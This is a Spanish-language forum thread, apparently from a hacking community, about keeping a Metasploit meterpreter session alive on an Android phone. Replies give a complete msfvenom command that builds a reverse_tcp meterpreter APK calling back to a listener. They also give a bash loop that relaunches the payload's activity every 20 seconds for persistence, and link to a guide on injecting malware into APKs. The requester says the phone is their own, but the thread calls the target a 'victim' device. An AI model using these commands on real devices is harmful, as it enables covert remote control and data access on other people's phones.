Buenas, oyer me puse a probar payloads de metasploit contra mi telefono andorid, al instalar el payload y darme sesion en meterpreter me di cuenta de que solo tengo la session activa cuando tengo la app abierta si la cierro se me quita la conexion, la cosa es que si habia alguna forma de tener tener la session abierta aun con la app cerrada
Por lo que entiendo, tu quieres conseguir una shell remota infectando a un android con un payload lo puedes generar con msfvenom por tanto intuyo que la aplicación/payload se crea correctamente, y luego, pones a la escucha (con el comando "use multi/handler") y si has puesto bien los puertos y todo, pues te agarrará una meterpreter, pues tu lo que quieres es a traves de la meterpreter conseguir una shell remota?
si es eso solo tienes que escirbir en la meterpreter el comando "shell", y ya esta, navegas por el android victima con comandos linux y ya esta.
ahora bien, si ese no es es problema, entonces es con el msfvenom, cuando creas el payload?
Ejemplo:
el comando: "msfvenom --platform android -p android/meterpreter/reverse_tcp LHOST=192.168.43.167 LPORT=53 R > ANDROID3.apk" pienso que esta mal, ya que añades la plataforma dos veces, la correcta sería:
"msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.... lport=4444 R> /root/Escritorio/payload.apk"
Espero te sirva.
Buenas tardes sombra1234, (https://underc0de.org/foro/profile/sombra1234/)
Como sabemos, la migración de procesos no funciona de igual forma en Android que en Windows. Por tanto, estoy suponiendo que ya tienes una session meterpreter con el objetivo y por tanto, deberás crear un .sh para posteriormente subirlo al teléfono Android y que se esté ejecutando de manera constante:
Script 'popular' usado para ello:
#!/bin/bash
while :
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done
Donde deberías poner el paquete y la activity del .apk que tienes(AndroidManifest.xml).
Un saludo.
Eso es lo que buscaba @Mortal_Poison (https://underc0de.org/foro/index.php?action=profile;u=69104) tienes alguna pagina o pdf que me explique un poco mas donde hay que colocarlo y eso, muchas gracias por la informacion
Muchas gracias @Dragora (https://underc0de.org/foro/index.php?action=profile;u=83483) por la respuesta
@sombra1234 (https://underc0de.org/foro/index.php?action=profile;u=86656) puedes revisar más en éste enlace. (https://www.youtube.com/watch?v=LIRdbreqZ68) Él tiene una apk que descompilo anteriormente. Si quizás no conoces cómo hacerlo, puedes revisar éste post (https://blog.underc0de.org/inyectando-malware-en-una-apk/) de Underc0de donde se enseña cómo hacerlo.
Un saludo.
@Mortal_Poison (https://underc0de.org/foro/index.php?action=profile;u=69104) Muchas gracias por la informacion! Ya me has solucionado mi duda